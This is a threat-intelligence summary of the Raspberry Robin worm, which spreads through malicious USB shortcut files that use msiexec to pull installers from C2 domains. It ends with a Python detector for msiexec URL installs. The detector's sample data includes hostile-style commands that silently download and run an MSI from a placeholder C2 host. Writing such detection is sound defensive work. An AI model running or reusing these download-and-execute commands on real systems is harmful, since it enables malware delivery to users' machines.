Raspberry Robin, also known as the QNAP worm, is typically delivered by a USB device, which contains a malicious Microsoft shortcut (.LNK) file. Once the user clicks on the .LNK file, it spawns a malicious command referencing msiexec.exe, a legitimate Windows system utility, to download and execute an MSI installer from a command and control (C2) domain.
INDUSTRIES: Transportation, Manufacturing, Oil And Gas
MALWARE FAMILIES: Dridex, Raspberry Robin
ATT&CK IDS: T1056 - Input Capture, T1140 - Deobfuscate/Decode Files or Information, T1199 - Trusted Relationship, T1106 - Native API, T1218 - Signed Binary Proxy Execution, T1547 - Boot or Logon Autostart Execution, T1027 - Obfuscated Files or Information, TA0011 - Command and Control
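The msiexec.exe step described above can be hunted for in process-creation telemetry. The following is an added detection sketch, not code from the report: it flags msiexec command lines whose install switch (`/i` or `/package`) points at an HTTP(S) URL and records whether a quiet switch is present. The sample command lines and the `example.test` hosts are constructed for illustration.

```python
import re
import shlex

INSTALL_SWITCHES = {"/i", "-i", "/package", "-package"}      # msiexec install options
QUIET_RE = re.compile(r"^[/-]q(uiet|[nbrf][+!-]*)?$", re.I)  # /q, /qn, /quiet, ...
URL_RE = re.compile(r"^https?://", re.I)

# Constructed process-creation command lines (not taken from the report).
SAMPLES = [
    r'"C:\Windows\System32\cmd.exe" /c start msiexec.exe /q /i "http://c2.example.test:8080/a.msi"',
    r'mSiExEc -Q -I hTTp://c2.example.test/x',
    r'msiexec.exe /i "C:\Users\alice\Downloads\setup.msi" /qn',
    r'msiexec.exe /x {PRODUCT-CODE-PLACEHOLDER} /qn',
    r'C:\Windows\System32\notepad.exe http://example.test/readme.txt',
]

def tokenize(cmdline):
    """Split a Windows command line; posix=False keeps backslashes literal."""
    try:
        tokens = shlex.split(cmdline, posix=False)
    except ValueError:  # unbalanced quote: fall back to a whitespace split
        tokens = cmdline.split()
    return [t.strip('"') for t in tokens]

def is_msiexec(token):
    """True when the token's file name is msiexec, with or without a path."""
    name = token.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return name in ("msiexec", "msiexec.exe")

def analyze(cmdline):
    """Return {'url', 'quiet'} when msiexec is asked to install from a URL, else None."""
    tokens = tokenize(cmdline)
    start = next((i for i, t in enumerate(tokens) if is_msiexec(t)), None)
    if start is None:
        return None
    args = tokens[start + 1:]
    for switch, value in zip(args, args[1:]):
        if switch.lower() in INSTALL_SWITCHES and URL_RE.match(value):
            quiet = any(QUIET_RE.match(a) for a in args)
            return {"url": value, "quiet": quiet}
    return None

def scan(lines):
    """Return (line_index, finding) for every command line that matches."""
    return [(i, f) for i, line in enumerate(lines) if (f := analyze(line))]

if __name__ == "__main__":
    for idx, finding in scan(SAMPLES):
        print(idx, finding)
```

Matching is case-insensitive and accepts both `/` and `-` switch prefixes, so mixed-case or dash-style invocations are still caught; local-path installs and uninstalls are not flagged.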